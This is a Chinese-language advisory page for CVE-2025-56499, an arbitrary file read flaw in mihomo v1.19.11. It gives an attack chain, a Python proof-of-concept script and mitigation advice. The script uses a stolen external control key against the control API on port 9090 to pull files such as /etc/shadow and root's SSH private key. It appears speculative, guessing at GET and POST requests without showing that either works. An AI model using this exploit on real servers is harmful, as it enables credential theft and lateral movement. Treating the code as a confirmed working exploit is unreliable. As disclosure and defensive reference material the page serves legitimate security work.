CVE-2025-56499: mihomo v1.19.11 访问控制错误导致任意文件读取漏洞

漏洞信息

漏洞编号

CVE-2025-56499

漏洞类型

访问控制错误/权限提升/任意文件读取

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

mihomo v1.19.11

漏洞概述

CVE-2025-56499是mihomo代理软件中发现的一个中等严重性安全漏洞。该漏洞存在于mihomo v1.19.11版本中，由于不正确的访问控制机制，允许经过身份验证的攻击者利用低级别权限读取任意文件。攻击者通过从配置文件中获取外部控制密钥（external control key），可以在不知晓完整权限的情况下，以提升的权限访问系统敏感文件。这一漏洞主要影响机密性，CVSS评分为6.5，属于中等严重级别。mihomo作为一款流行的代理软件，广泛应用于网络流量管理和代理场景，该漏洞的存在可能导致用户配置文件、密钥文件、系统敏感文件等被未授权访问。攻击者无需高权限即可利用此漏洞，但需要一定的认证凭据或获取配置文件的途径。建议用户及时更新到最新版本，并妥善保管配置文件，防止密钥泄露。

技术细节

该漏洞的根本原因在于mihomo v1.19.11版本中的访问控制机制存在缺陷。在正常情况下，外部控制接口应该仅允许拥有正确控制密钥的请求执行敏感操作。然而，该版本允许攻击者通过获取配置文件中的外部控制密钥，以低权限用户身份执行本应需要更高权限的操作。具体而言，攻击者首先需要获取mihomo的配置文件（可能通过其他途径泄露或配置错误），从中提取external control key。随后，攻击者使用该密钥向外部控制接口发送请求，由于访问控制检查不当，系统会授予攻击者提升的权限。利用这一权限提升，攻击者可以构造特定的请求来读取服务器上的任意文件，包括但不限于/etc/passwd、/etc/shadow、应用程序配置文件、SSH密钥等敏感文件。CVSS向量AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N表明该漏洞通过网络攻击即可利用，攻击复杂度低，需要低权限认证，无需用户交互，主要影响系统的机密性。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先需要获取mihomo的配置文件，通常通过配置文件泄露、错误配置、目录遍历或其他信息泄露途径获取配置文件内容。

STEP 2

步骤2: 提取控制密钥

从获取的配置文件中提取external control key，该密钥用于认证外部控制接口的请求。

STEP 3

步骤3: 构建恶意请求

攻击者使用提取的control key构造HTTP请求，访问mihomo的外部控制接口（通常在9090端口）。

STEP 4

步骤4: 权限提升

由于访问控制检查存在缺陷，系统错误地授予攻击者提升的权限，使其能够执行本不应有权限执行的操作。

STEP 5

步骤5: 任意文件读取

利用提升的权限，攻击者构造文件读取请求，指定目标文件路径（如/etc/passwd、/etc/shadow、SSH密钥等敏感文件），服务器返回文件内容。

STEP 6

步骤6: 横向移动或持久化

获取的敏感信息可用于进一步攻击，如利用SSH密钥进行横向移动，利用密码文件进行凭证重用攻击等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-56499 PoC - mihomo External Control Key Exploitation
# Description: Exploit incorrect access control to read arbitrary files via external control interface

import requests
import json
import argparse

def exploit_mihomo(target_url, control_key, file_path):
    """
    Exploit CVE-2025-56499 to read arbitrary files from mihomo server
    
    Args:
        target_url: Base URL of mihomo admin interface
        control_key: External control key obtained from config file
        file_path: Path to file to read (e.g., /etc/passwd)
    """
    
    # Construct the external control API endpoint
    api_url = f"{target_url.rstrip('/')}/configs?force=true"
    
    # Prepare headers with control key
    headers = {
        'Authorization': f'Bearer {control_key}',
        'Content-Type': 'application/json'
    }
    
    # Method 1: Try to read config file directly
    payload = {
        'path': file_path
    }
    
    try:
        print(f"[*] Target: {target_url}")
        print(f"[*] Attempting to read: {file_path}")
        
        # Attempt 1: Direct file read via configs endpoint
        response = requests.get(api_url, headers=headers, params=payload, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Success! File content retrieved:")
            print(response.text)
            return True
        
        # Attempt 2: Try POST request with file path
        response = requests.post(api_url, headers=headers, json=payload, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Success! File content retrieved via POST:")
            print(response.text)
            return True
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False
    
    print("[-] Exploitation failed - check control key and target")
    return False

def main():
    parser = argparse.ArgumentParser(description='CVE-2025-56499 PoC')
    parser.add_argument('-t', '--target', required=True, help='Target mihomo URL')
    parser.add_argument('-k', '--key', required=True, help='External control key')
    parser.add_argument('-f', '--file', default='/etc/passwd', help='File to read')
    
    args = parser.parse_args()
    
    exploit_mihomo(args.target, args.key, args.file)

if __name__ == '__main__':
    main()

# Usage:
# python cve-2025-56499.py -t http://target:9090 -k "your-control-key" -f /etc/passwd
# python cve-2025-56499.py -t http://target:9090 -k "your-control-key" -f /root/.ssh/id_rsa

影响范围

mihomo v1.19.11

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1）立即检查并限制配置文件的访问权限，确保未经授权用户无法读取配置文件；2）修改external control key为强随机字符串；3）通过网络ACL或防火墙规则限制外部控制接口（默认9090端口）的访问，仅允许受信任的IP地址访问；4）监控mihomo服务的访问日志，及时发现异常访问行为；5）考虑使用反向代理或VPN隧道保护外部控制接口；6）如果可能，暂时禁用外部控制接口功能；7）评估是否需要部署WAF（Web应用防火墙）来检测和阻止恶意请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-56499
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-56499
3 Details https://www.cvedetails.com/cve/CVE-2025-56499/
4 VulDB https://vuldb.com/cve/CVE-2025-56499
5 Link https://github.com/Cherrling/CVE-2025-56499
6 Link https://github.com/MetaCubeX/mihomo/tree/v1.19.11